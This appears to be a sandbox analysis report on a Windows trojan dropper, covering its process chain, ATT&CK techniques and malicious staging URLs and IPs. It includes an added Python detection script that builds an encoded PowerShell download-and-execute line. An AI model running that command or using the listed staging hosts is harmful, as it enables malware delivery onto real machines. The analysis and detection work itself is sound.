            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (VolumeInformation; 3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (VolumeInformation; 3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (VolumeInformation; 12 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (VolumeInformation; 2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll (VolumeInformation)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll (VolumeInformation)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe; Code function: 0_2_00007FF6A1D88964 GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, GetTickCount, QueryPerformanceCounter (0_2_00007FF6A1D88964)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe; Code function: 0_2_00007FF6A1D82C54 GetVersion, GetModuleHandleW, GetProcAddress, ExitWindowsEx, CloseHandle (0_2_00007FF6A1D82C54)
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match; File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000009.00000002.2278176981.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000009.00000002.2278176981.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques flagged for this sample, listed per tactic; the bracketed digits are the report's per-cell signature markers, unflagged matrix cells omitted)

Reconnaissance: none flagged
Resource Development: Scripting [111]
Initial Access: none flagged
Execution: Native API [2]; Exploitation for Client Execution [1]; Command and Scripting Interpreter [2]; PowerShell [2]
Persistence: Scripting [111]; DLL Side-Loading [1]; Registry Run Keys / Startup Folder [1]
Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [211]; Registry Run Keys / Startup Folder [1]
Defense Evasion: Disable or Modify Tools [1]; Install Root Certificate [1]; Software Packing [1]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [31]; Access Token Manipulation [1]; Process Injection [211]; Rundll32 [1]
Credential Access: none flagged
Discovery: System Time Discovery [1]; File and Directory Discovery [2]; System Information Discovery [16]; Security Software Discovery [1]; Process Discovery [1]; Application Window Discovery [1]
Lateral Movement: none flagged
Collection: Archive Collected Data [1]
Command and Control: Ingress Tool Transfer [3]; Encrypted Channel [21]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]
Exfiltration: none flagged
Impact: System Shutdown/Reboot [1]
Behavior Graph ID: 1611341
Sample: SecuriteInfo.com.Win64.Malw...
Start date: 10/02/2025
Architecture: WINDOWS
Score: 100
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
Contacted hosts: ofice365.github.io; bitbucket.org

Process tree:
SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe (started)
    dropped: C:\Users\user\AppData\...\67a7e5e159f71.vbs (ASCII)
    cmd.exe
        wscript.exe
            signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
            powershell.exe
                signatures: Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                powershell.exe
                    network: ofice365.github.io 185.199.108.153:443 (FASTLY, US; Netherlands), local port 49711; 62.60.226.64:80 (ASLINE-AS-AP ASLINE LIMITED, HK; Iran (ISLAMIC Republic Of)), local port 49759; bitbucket.org 185.166.143.49:443 (AMAZON-02, US; Germany), local port 49709
                    signatures: Installs new ROOT certificates; Writes to foreign memory regions; Injects a PE file into a foreign processes; Loading BitLocker PowerShell Module
                    vbc.exe
                        dropped: C:\Users\user\AppData\Roaming\...\Vbc.exe (PE32)
                        Vbc.exe
                            conhost.exe
                conhost.exe
        conhost.exe
rundll32.exe (started)
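The chain above (sample, cmd.exe, wscript.exe running a script from a user-writable folder, PowerShell with an encoded command, a second PowerShell that loads an assembly from Base64 and then spawns vbc.exe as an injection target) is what the Sigma hits in this report describe. The following is an added example, not part of the Joe Sandbox report or of the sample: it applies those chain rules to Sysmon-style process-creation events and decodes the -EncodedCommand argument so the analyst can see what the script host actually launched. The events, PIDs, paths, the script name stage1.vbs and the command lines are constructed for illustration; csc.exe is included next to vbc.exe as an assumption about other .NET compilers abused the same way, it is not named in the report.

```python
import base64
import re
from collections import defaultdict

# Constructed Sysmon-like process-creation events modelled on the chain in the
# report (sample -> cmd.exe -> wscript.exe -> powershell.exe -> powershell.exe -> vbc.exe).
# PIDs, paths and command lines are illustrative, not values from the analysis.
ENCODED_STAGE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s')".encode("utf-16le")
).decode()

EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\user\Desktop\sample.exe",
     "cmdline": r"C:\Users\user\Desktop\sample.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\stage1.vbs"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Local\Temp\stage1.vbs"'},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_STAGE}"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c [Reflection.Assembly]::Load([Convert]::FromBase64String($b))"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "cmdline": "vbc.exe"},
    # benign control: an interactive shell started from explorer must not fire any rule
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INJECTION_HOSTS = {"vbc.exe", "csc.exe"}  # .NET compilers used as hollowing targets (assumption)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public)\\", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(events, pid, max_depth=4):
    """Yield the image names of a process's ancestors, nearest first."""
    by_pid = {e["pid"]: e for e in events}
    cur = by_pid.get(pid)
    for _ in range(max_depth):
        if cur is None or cur["ppid"] not in by_pid:
            return
        cur = by_pid[cur["ppid"]]
        yield basename(cur["image"])


def decode_encoded_command(cmdline):
    """Plaintext of a -enc/-EncodedCommand argument (Base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Apply the chain rules and return {rule_name: [pid, ...]}."""
    hits = defaultdict(list)
    for e in events:
        name = basename(e["image"])
        anc = list(ancestors(events, e["pid"]))
        # script interpreter executing a file from a user-writable directory
        if name in SCRIPT_HOSTS and USER_WRITABLE.search(e["cmdline"]):
            hits["script_host_from_user_writable_dir"].append(e["pid"])
        # PowerShell with wscript/cscript within two hops (cmd.exe in between does not hide it)
        if name == "powershell.exe" and SCRIPT_HOSTS & set(anc[:2]):
            hits["wscript_spawns_powershell"].append(e["pid"])
        if name == "powershell.exe":
            if decode_encoded_command(e["cmdline"]) is not None:
                hits["encoded_powershell_command"].append(e["pid"])
            if re.search(r"FromBase64String|\[Reflection\.Assembly\]::Load", e["cmdline"], re.I):
                hits["powershell_inline_assembly_load"].append(e["pid"])
        # PowerShell starting a .NET compiler binary: the injection host seen in the report
        if name in INJECTION_HOSTS and anc[:1] == ["powershell.exe"]:
            hits["powershell_spawns_dotnet_compiler"].append(e["pid"])
    return dict(hits)


if __name__ == "__main__":
    for rule, pids in detect(EVENTS).items():
        print(f"{rule}: {pids}")
    print(decode_encoded_command(EVENTS[4]["cmdline"]))
```

The ancestry walk is the part worth keeping: a rule keyed only on direct parent misses the cmd.exe hop that this sample uses between the dropper and wscript.exe, and the second PowerShell (the one that contacts the staging hosts and injects into vbc.exe) has PowerShell, not wscript.exe, as its parent. Decoding the encoded command is what turns the alert into something a responder can act on.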

Initial Sample
Source | Detection | Scanner | Label
SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | 41% | Virustotal |
SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | 39% | ReversingLabs | Win64.Trojan.Amadey

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe | 0% | ReversingLabs |

Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://62.60.226.64/public_files/Sjofbrd.txt | 100% | Avira URL Cloud | malware
https://ofice365.github.io/1/test.jpg | 100% | Avira URL Cloud | malware
https://preferences.atlassian.com | 0% | Avira URL Cloud | safe
failed2.myftp.org | 0% | Avira URL Cloud | safe
https://ofice365.github.io | 100% | Avira URL Cloud | malware
https://bitbucket.status.atlassian.com/ | 0% | Avira URL Cloud | safe
https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d | 0% | Avira URL Cloud | safe
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bitbucket.org | 185.166.143.49 | true | false | | high
ofice365.github.io | 185.199.108.153 | true | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://ofice365.github.io/1/test.jpg | true | Avira URL Cloud: malware | unknown
http://62.60.226.64/public_files/Sjofbrd.txt | true | Avira URL Cloud: malware | unknown
https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 | false | | high
failed2.myftp.org | true | Avira URL Cloud: safe | unknown
URLs from Memory and Binary Strings
Name | Source | Malicious | Antivirus Detection | Reputation
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ad | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://id.atlassian.com/login | powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ofice365.github.io | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/ | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://id.atlassian.com/logout | powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://admin.atlassian.com | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://web-security-reports.services.atlassian.com/csp-report/bb-website | powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.bitbucket.org | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dz8aopenkvv6s.cloudfront.net | powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://preferences.atlassian.com | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://id.atlassian.com/manage-profile/ | powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ap | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ve | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/jsi18n/en/dj | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.atlassian.com/try/cloud/signup?bundle=bitbucket | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bitbucket.status.atlassian.com/ | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.cookielaw.org/ | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/img/logos/bi | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://id.atlassian.com/profile/rest/profile" | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aui-cdn.atlassian.com/ | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.2582750813.0000026087457000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2582750813.0000026087494000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/themes/a | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bitbucket.org/gateway/api/emoji/ | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bqlf8qjztdtr.statuspage.io | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.2582750813.00000260874C1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bitbucket.org | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/dist/webpack | powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/img/default_ | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://id.atlassian.com/login?prompt=login&continue=https%3A%2F%2Fbitbucket.org%2Fccccccccccccn | powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          62.60.226.64
                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                          18013ASLINE-AS-APASLINELIMITEDHKtrue
                                                                                          185.166.143.49
                                                                                          bitbucket.orgGermany
                                                                                          16509AMAZON-02USfalse
                                                                                          185.199.108.153
                                                                                          ofice365.github.ioNetherlands
                                                                                          54113FASTLYUStrue
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1611341
Start date and time: 2025-02-10 19:57:24 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@18/11@2/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 37
• Number of non-executed functions: 29
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1352 because it is empty
• Execution Graph export aborted for target vbc.exe, PID 2404 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
13:58:16 | API Interceptor | 46x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
62.60.226.64 | dDFw6mJ.exe | malicious | Vidar | 62.60.226.64/public_files/kjgjgfS.txt
62.60.226.64 | Set-UPl.exe | malicious | LummaC Stealer | 62.60.226.64/public_files/mearpck.txt
62.60.226.64 | good.exe | malicious | RHADAMANTHYS | 62.60.226.64/public_files/kmAFAhc.txt
185.166.143.49 | http://jasonj002.bitbucket.io/ | malicious | HTMLPhisher | jasonj002.bitbucket.io/
185.199.108.153 | http://jp-iitkgp.github.io/SAC_insta | malicious | HTMLPhisher | jp-iitkgp.github.io/SAC_insta
185.199.108.153 | http://adhi-ns.github.io/netflix | malicious | HTMLPhisher | adhi-ns.github.io/netflix
185.199.108.153 | http://akhi1704.github.io/tailwind_fb-clone | malicious | HTMLPhisher | akhi1704.github.io/tailwind_fb-clone
185.199.108.153 | http://adarsh389.github.io/adarsh.instagram/ | malicious | HTMLPhisher | adarsh389.github.io/adarsh.instagram/
185.199.108.153 | http://sumitumrao.github.io/Netflixclone/ | malicious | HTMLPhisher | sumitumrao.github.io/Netflixclone/
185.199.108.153 | http://amitekharr.github.io/ab | malicious | Unknown | amitekharr.github.io/ab
185.199.108.153 | http://brownnaza222.github.io/myfbsample | malicious | HTMLPhisher | brownnaza222.github.io/myfbsample
185.199.108.153 | http://somya-patidar.github.io/netflix | malicious | HTMLPhisher | somya-patidar.github.io/netflix
185.199.108.153 | http://adarsh389.github.io/adarsh.instagram | malicious | HTMLPhisher | adarsh389.github.io/adarsh.instagram
185.199.108.153 | http://janvi426.github.io/Netflix-Home-Page-Clone | malicious | HTMLPhisher | janvi426.github.io/Netflix-Home-Page-Clone
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ofice365.github.io | payment copy.vbs | malicious | Discord Token Stealer | 185.199.108.153
ofice365.github.io | dDFw6mJ.exe | malicious | Vidar | 185.199.108.153
bitbucket.org | https://angelapledfgww.github.io/claragelz/claradetailsforijf.html | malicious | Unknown | 185.166.143.49
bitbucket.org | Payment slip.vbs | malicious | Discord Token Stealer | 185.166.143.48
bitbucket.org | 00wVZ1NU5b.exe | malicious | Unknown | 185.166.143.49
bitbucket.org | Set-UPl.exe | malicious | LummaC Stealer | 185.166.143.48
bitbucket.org | good.exe | malicious | RHADAMANTHYS | 185.166.143.48
bitbucket.org | phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml | malicious | ScreenConnect Tool | 185.166.143.48
bitbucket.org | phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml | malicious | ScreenConnect Tool | 185.166.143.50
